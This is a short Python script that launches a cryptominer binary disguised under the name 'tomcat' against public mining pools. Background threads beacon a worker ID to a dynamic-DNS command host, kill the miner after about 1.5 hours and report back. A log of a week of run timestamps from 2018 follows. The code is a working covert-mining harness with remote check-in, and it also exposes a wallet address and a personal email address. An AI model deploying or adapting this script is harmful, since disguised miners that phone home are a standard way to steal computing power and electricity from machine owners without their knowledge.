import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:10:06.386774
#2018-02-17 15:57:06.156232
#2018-02-17 17:46:04.050907
#2018-02-17 19:35:04.673373
#2018-02-17 21:25:08.239684
#2018-02-17 23:09:05.130493
#2018-02-18 00:56:06.625384
#2018-02-18 02:44:04.413828
#2018-02-18 04:33:03.126580
#2018-02-18 06:24:02.100378
#2018-02-18 08:12:05.895568
#2018-02-18 09:59:02.178365
#2018-02-18 11:46:05.765517
#2018-02-18 13:30:01.888613
#2018-02-18 15:19:06.713970
#2018-02-18 17:08:05.813378
#2018-02-18 18:56:07.262271
#2018-02-18 20:43:01.516762
#2018-02-18 22:27:05.474881
#2018-02-19 00:16:05.077407
#2018-02-19 02:02:07.301650
#2018-02-19 03:48:07.414613
#2018-02-19 05:32:06.679813
#2018-02-19 07:19:03.985997
#2018-02-19 09:08:01.287115
#2018-02-19 10:56:01.363196
#2018-02-19 12:45:07.818667
#2018-02-19 14:34:09.534468
#2018-02-19 16:22:05.185054
#2018-02-19 18:09:05.524836
#2018-02-19 19:57:05.141983
#2018-02-19 21:47:01.457967
#2018-02-19 23:32:01.744306
#2018-02-20 01:18:08.364273
#2018-02-20 03:09:04.230538
#2018-02-20 04:56:06.702882
#2018-02-20 06:40:06.972035
#2018-02-20 08:25:01.683325
#2018-02-20 10:10:10.231474
#2018-02-20 11:54:05.085401
#2018-02-20 13:43:04.723143
#2018-02-20 15:32:08.813105
#2018-02-20 17:18:11.009106
#2018-02-20 19:08:08.428257
#2018-02-20 20:56:02.155693
#2018-02-20 22:41:01.941292
#2018-02-21 00:23:04.118644
#2018-02-21 02:08:05.744858
#2018-02-21 03:54:05.387894
#2018-02-21 05:41:05.510387
#2018-02-21 07:29:04.046919
#2018-02-21 09:13:07.985490
#2018-02-21 11:02:11.219503
#2018-02-21 12:49:07.086933
#2018-02-21 14:37:10.195917
#2018-02-21 16:25:02.133562
#2018-02-21 18:15:11.247741
#2018-02-21 20:01:09.691852
#2018-02-21 21:47:05.076596
#2018-02-21 23:54:01.915603
#2018-02-22 01:43:04.406836
#2018-02-22 03:31:07.552280
#2018-02-22 05:19:06.286839
#2018-02-22 07:03:07.035375
#2018-02-22 08:49:05.721134
#2018-02-22 10:37:07.898501
#2018-02-22 12:23:07.955236
#2018-02-22 14:09:01.329648
#2018-02-22 15:55:04.136576
#2018-02-22 17:41:09.040349
#2018-02-22 19:29:05.959320
#2018-02-22 21:21:01.571275
#2018-02-22 23:06:01.736873
#2018-02-23 00:53:01.862161
#2018-02-23 02:39:07.397351
#2018-02-23 04:27:01.636403
#2018-02-23 06:13:04.600975
#2018-02-23 07:58:06.479421
#2018-02-23 10:13:06.141526
#2018-02-23 12:07:07.216797
#2018-02-23 13:54:01.727692
#2018-02-23 15:45:03.619257
#2018-02-23 17:31:01.719122
#2018-02-23 19:19:08.494517
#2018-02-23 21:03:08.389822
#2018-02-23 22:49:07.343051
#2018-02-24 00:37:01.940583
#2018-02-24 02:27:05.051646
#2018-02-24 04:17:07.451795
#2018-02-24 06:04:07.136949
#2018-02-24 07:51:05.111052
#2018-02-24 09:34:07.089498
#2018-02-24 11:28:06.183657
#2018-02-24 13:17:06.156585
#2018-02-24 15:08:05.944233
#2018-02-24 16:56:06.119824
#2018-02-24 18:46:03.713689
#2018-02-24 20:37:03.694671
#2018-02-24 22:43:03.748746
#2018-02-25 02:05:06.947667
#2018-02-25 05:43:05.219559
#2018-02-25 11:37:05.543502